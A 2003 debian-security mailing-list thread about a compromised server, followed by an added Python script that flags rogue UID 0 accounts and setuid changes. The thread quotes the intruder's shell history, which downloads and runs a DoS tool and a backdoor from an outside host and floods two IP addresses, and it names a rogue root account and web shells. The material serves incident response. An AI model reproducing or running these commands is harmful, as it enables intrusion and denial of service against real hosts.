
Re: Strange segmentation faults and Zombies



Don't forget to try to find the potential hole first!
Otherwise you could have a fast recurrence.

Christian

----- Original Message -----
From: "Josh Carroll" <josh.carroll@psualum.com>
To: <debian-security@lists.debian.org>
Sent: Thursday, September 18, 2003 9:12 AM
Subject: Re: Strange segmentation faults and Zombies


> Backup /etc and any other data you have, and you can reference your configuration files later
> during your re-install.
>
> At this point, re-installation is a must. Never delude yourself into thinking you can 'recover'
> from being rooted. Sure, you might be able to do so after a lot of effort/etc, but then again
> maybe you'll forget something and a backdoor will remain. Best bet is to re-install, referencing your
> existing configuration files (though I would NOT use them as-is without inspection, since they
> could potentially have backdoor'd the configs as well).
>
> Good luck.
>
> Josh
>
>
> Markus Schabel (markus.schabel@tgm.ac.at) wrote:
> > Laurent Corbes {Caf'} wrote:
> > >On Wed, 17 Sep 2003 22:29:58 +0200
> > >Markus Schabel <markus.schabel@tgm.ac.at> wrote:
> > >
> > >
> > >>I've seen some strange things on my (stable with security-updates)
> > >>server: the last apt-get update didn't work because gzip segfaulted.
> > >>I've copied gzip from another server over the version on this server,
> > >>but it also crashed. Interesting was that the executable was bigger
> > >>after the segfault.
> > >
> > >
> > >curious.
> > >
> > >
> > >>In a ps I can see a lot of Zombies (rm, ln, readlink, grep) and I've no
> > >>idea where they come from.
> > >
> > >
> > >it's the daily cronjob that stole.
> >
> > yes, and that's reproducible :(
> >
> > >>You think the server got hacked? Are there any other things that can
> > >>lead to this? man also behaves strange, it says either "No manual entry
> > >>for...", "What manual page do you want?" or nothing.
> > >
> > >
> > >I'm thinking about a hardware problem.
> > >Maybe the hard drive is failing (get the output of dmesg) or a very big
> > >RAM problem that corrupts files on the hard drive.
> >
> > request_module[net-pf-14]: waitpid(15400,...) failed, errno 1
> > ptrace uses obsolete (PF_INET,SOCK_PACKET)
> > eth0: Promiscuous mode enabled.
> > device eth0 entered promiscuous mode
> > eth0: Promiscuous mode enabled.
> >
> > but nothing about the disks
> >
> > >in every case simply copy all the data you can and inspect the hdd in
> > >another box mounting it read only.
> >
> > setuid.changes lists /dev/* and the following programs:
> > pppd
> > postdrop
> > postqueue
> > wall
> > newgrp
> > at
> > chage
> > chfn
> > chsh
> > expiry
> > gpasswd
> > passwd
> > write
> > crontab
> > dotlockfile
> > ssh-keysign
> > procmail
> > lockfile
> > popauth
> > pt_chown
> > traceroute
> > mount
> > umount
> > login
> > su
> > ping
> > suexec
> > /usr/lib/mc/bin/cons.saver
> >
> > and a new user exists in /etc/passwd: slacks:x:0:0::/etc/.rpn:/bin/bash
> >
> > in /etc/.rpn there's a .bash_history with the following content:
> >
> > >id
> > >mkdir /etc/.rpn
> > >ps -aux
> > >ps -aux | grep tbk
> > >kill -15292 pid
> > >kill 15292
> > >netconf
> > >locate httpd.conf
> > >cd /etc/.rpn
> > >ls -al
> > >wget
> > >cd /var/www/cncmap/www/upload/renegade
> > >ls -al
> > >rm -rf phpshell.php
> > >cat bd.c
> > >gcc -o bd bd.c
> > >ftp ftp.hpg.com.br
> > >rm -rf bd.c
> > >cd /tmp
> > >cd /etc/.rpn
> > >wget www.slacks.hpg.com.br/psyBNC.tar.gz
> > >tar zvxf psyBNC.tar.gz
> > >tar -zvxf psyBNC.tar.gz
> > >tar
> > >gunzip psyBNC.tar.gz
> > >tar -Acdtrux psyBNC.tar.gz
> > >tar -x psyBNC.tar.gz
> > >tar -Acd psyBNC.tar.gz
> > >tar -cd psyBNC.tar.gz
> > >tar --help
> > >pwd
> > >ls
> > >rm -rf *
> > >wget www.slacks.hpg.com.br/bin/dos
> > >chmod +x dos
> > >./dos
> > >./dos 200.101.87.8 65535 8569
> > >./dos 200.199.95.11 65535 8569
> >
> > and the executable dos
> >
> > interesting is the line "tar --help" :D
> >
> > in "last" I see the following:
> >
> > >slacks   pts/0        Sun Sep 14 02:26 - 03:37  (01:11)
> > >200-147-107-35.tlm.dialuol.com.br
> >
> > IP of the hacker is 200.147.107.35
> > I think we have no chance of legal actions against .br?
> >
> > in the directory /var/www/cncmap/www/upload/renegade there are the
> > following files: backhole.pl
> > e.c ("Copyright (c) 2003 DTORS Security, ANGELO ROSIELLO 18/02/2003,
> > LES-EXPLOIT for Linux x86")
> > rem.php (phpRemoteView)
> >
> > so we got hacked :(
> >
> > what information should we gather before we reinstall the complete
> > server? I think we have to reinstall the whole thing or do you have
> > any ideas?
> >
> > thanks
> > Markus
> >
> >
> > --
> > To UNSUBSCRIBE, email to debian-security-request@lists.debian.org
> > with a subject of "unsubscribe". Trouble? Contact
> > listmaster@lists.debian.org
> >
>
>
>

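Two of the indicators Markus found can be checked mechanically on a backup of /etc: a second UID 0 account in /etc/passwd and a setuid list that differs from a known-good baseline (the check Debian's checksecurity writes to setuid.changes). The script below is an added example, not code from the thread or from checksecurity; the passwd excerpt, the baseline and the `/etc/.rpn/bd` path are constructed for the demonstration.

```python
# Added example: triage checks for a rogue UID 0 account and a changed setuid
# list, the two findings reported in the thread. All input data is constructed.
from typing import Dict, List, Set

# Constructed /etc/passwd excerpt; the 'slacks' line mirrors the one in the thread.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
markus:x:1000:1000:Markus:/home/markus:/bin/bash
slacks:x:0:0::/etc/.rpn:/bin/bash
"""

def rogue_root_accounts(passwd_text: str) -> List[Dict[str, str]]:
    """Return every account with UID 0 or GID 0 whose name is not 'root'.
    A home directory under a hidden path is flagged too, as a second sign."""
    hits = []
    for line in passwd_text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            continue  # malformed line; worth a look, but not a UID 0 finding
        name, _, uid, gid, _, home, shell = fields
        if name == "root":
            continue
        reasons = []
        if uid == "0":
            reasons.append("uid 0")
        if gid == "0":
            reasons.append("gid 0")
        if any(part.startswith(".") for part in home.split("/") if part):
            reasons.append("hidden home dir")
        if reasons:
            hits.append({"name": name, "home": home, "shell": shell,
                         "reasons": ", ".join(reasons)})
    return hits

def setuid_changes(baseline: Set[str], current: Set[str]) -> Dict[str, List[str]]:
    """Diff two sets of setuid paths, as checksecurity does nightly.
    New entries (e.g. a setuid binary dropped by an intruder) matter most."""
    return {"added": sorted(current - baseline),
            "removed": sorted(baseline - current)}

# Constructed baseline vs. current list; the added path is hypothetical.
BASELINE = {"/bin/su", "/bin/ping", "/usr/bin/passwd", "/bin/mount"}
CURRENT = BASELINE | {"/etc/.rpn/bd"}

if __name__ == "__main__":
    for hit in rogue_root_accounts(SAMPLE_PASSWD):
        print("suspicious account:", hit)
    print("setuid diff:", setuid_changes(BASELINE, CURRENT))
```

Run it against the passwd file and setuid listing taken from the backup rather than from the live host, since the binaries on a rooted system (gzip, ps, man here) can no longer be trusted to report honestly.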

